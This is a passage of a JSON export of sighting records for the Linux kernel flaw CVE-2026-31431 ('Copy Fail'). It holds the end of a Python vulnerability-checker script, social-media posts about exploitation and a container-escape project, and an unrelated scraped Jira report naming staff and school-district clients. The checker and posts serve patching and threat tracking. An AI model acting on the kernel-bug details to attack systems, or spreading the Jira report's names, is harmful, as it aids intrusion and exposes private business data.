0:\n        ctx = after[max(marker_off - 4, 0):marker_off + 12]\n        print(f\"[!] VULNERABLE to CVE-2026-31431.\")\n        print(f\"[!]   Marker {MARKER!r} (AAD seqno_lo) landed in the spliced \"\n              f\"page-cache page at offset {marker_off}.\")\n        print(f\"[!]   Surrounding bytes: {ctx.hex()}  ({ctx!r})\")\n        print(f\"[!] Apply the upstream fix or block algif_aead immediately.\")\n        return 2\n\n    if diffs:\n        first = diffs[0]\n        window = after[first:first + 16]\n        print(f\"[!] Page cache MODIFIED via in-place AEAD splice path \"\n              f\"({len(diffs)} bytes changed, first at offset {first}).\")\n        print(f\"[!]   Window: {window.hex()}\")\n        print(f\"[!]   The controllable scratch-write marker did not land, but \"\n              f\"the kernel still allowed a page-cache page into the writable \"\n              f\"AEAD destination scatterlist.\")\n        print(f\"[!]   Treat as VULNERABLE to the underlying bug class until \"\n              f\"a patched kernel is installed.\")\n        return 2\n\n    print(\"[+] Page cache intact. NOT vulnerable on this kernel.\")\n    return 0\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())", "creation_timestamp": "2026-05-06T15:53:28.000000Z"}, {"uuid": "a6df5826-7e7b-4177-abab-e6ede39bd765", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83088", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail-Container-Escape\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a hans362\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 15:47:17\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T16:00:05.000000Z"}, {"uuid": "19f5a1cd-54da-4efc-8bf6-c7184a938de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/technadu/statuses/116528712933814184", "content": "CISA warns: CopyFail Linux vuln exploited.\u2022 Privilege escalation \u2192 root\u2022 Impacts major distros\u2022 Patch deadline May 15\nhttps://www.technadu.com/cisa-warns-of-severe-copyfail-linux-vulnerability-under-active-exploitation-cve-2026-31431/627365/\nAre you patched?#InfoSec #Linux #CyberSecurity", "creation_timestamp": "2026-05-06T17:04:12.756967Z"}, {"uuid": "bee1c039-f5e5-4cbc-9487-f3724786a938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/intel.overresearched.net/post/3ml7lawv3vk2v", "content": "PAN-OS CVE-2026-0300 zero-day exploited (CVSS 9.3)\nLinux 'Copy Fail' CVE-2026-31431 LPE\nAPT37 BirdCall, MuddyWater Teams decoy, ShinyHunters 280M Instructure records\n\nFull brief: intel.overresearched.net/2026/05/06/c...\n#Daily #ThreatIntel #InfoSec", "creation_timestamp": "2026-05-06T20:49:48.038201Z"}, {"uuid": "0e1915fa-3c78-4dcf-9221-b010001ed231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/serena666.bsky.social/post/3ml7lzrmaaq2k", "content": "BEFORE: Cloud was secure. AFTER: \"Copy Fail\" (CVE-2026-31431) lets any rando get root on your Linux box. Millions of k8s clusters at risk. Patch NOW or get pwned. \ud83e\udd26", "creation_timestamp": "2026-05-06T21:03:41.096305Z"}, {"uuid": "93dcfbdf-4a8b-49c1-9bfe-e7b2b86eb2cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dfedmpls.bsky.social/post/3ml7m4ungtk2t", "content": "Holy shit CVE-2026-31431\n\nnvd.nist.gov/vuln/detail/...", "creation_timestamp": "2026-05-06T21:05:24.092237Z"}, {"uuid": "a8485898-022c-4f2b-8fd4-33a1e31734f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/3b5bccc17b7e14b046e06c7692b3a1de", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 06, 2026 at 10:12 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n2\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                2 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 2\n                    \n\n                      DO-2051\n                      Aldine, TX - Backup data and then copy to summer site\n                      \u2014\n                      May 6, '26\n                      May 6, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2049\n                      San Bernardino, CA - Please set up summer school ASDI \n                      Cory Emlen\n                      May 6, '26\n                      May 6, '26\n                      \u2014\n                      Verification\n                    \n\n\n\nDO \u2014 Edulog DevOps\n3\n\nIM \u2014 Incident Management\n5\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                3 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 3\n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID - May 29 shutdown\n                      Vader\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      On hold\n                    \n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                5 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 4\n                    \n\n                      IM-7574\n                      Gwinnett, GA - Missing Data in Telematics\n                      Josiah Brown\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      WORK IN PROGRESS\n                    \n                    \n\n                      IM-7573\n                      Brunswick County, NC - APP Issues\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \nTask 1\n                    \n\n                      IM-7572\n                      Framingham Public Schools, GPS units not reporting in since 11:30 AM today\n                      Nick Sundberg\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n8\n\nIM \u2014 Incident Management\n13\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                8 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      May 6, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 5\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 6, '26\n                      May 4, '26\n                      Backlog\n                    \n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 6, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 6, '26\n                      \u2014\n                      Verification\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                13 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 13\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 6, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      May 6, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (30d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (34d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (38d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (28d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (27d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1555\n                      [Houston-1.780] 500 internal server error for \"search\"call inside stop module\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 06, 2026 at 10:12 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-06T22:12:42.000000Z"}, {"uuid": "0e39e51d-dae5-4877-9317-9d6de9e3ba98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3ml7sgjqeef2d", "content": "Linux\u306e\u8106\u5f31\u6027\u5bfe\u7b56\u306b\u3064\u3044\u3066(CVE-2026-31431\u3001Copy Fail)  #IPA (May 1)\n\nwww.ipa.go.jp/security/sec...", "creation_timestamp": "2026-05-06T22:58:10.527487Z"}, {"uuid": "19812639-2563-4147-a1fd-d22081ccfb24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 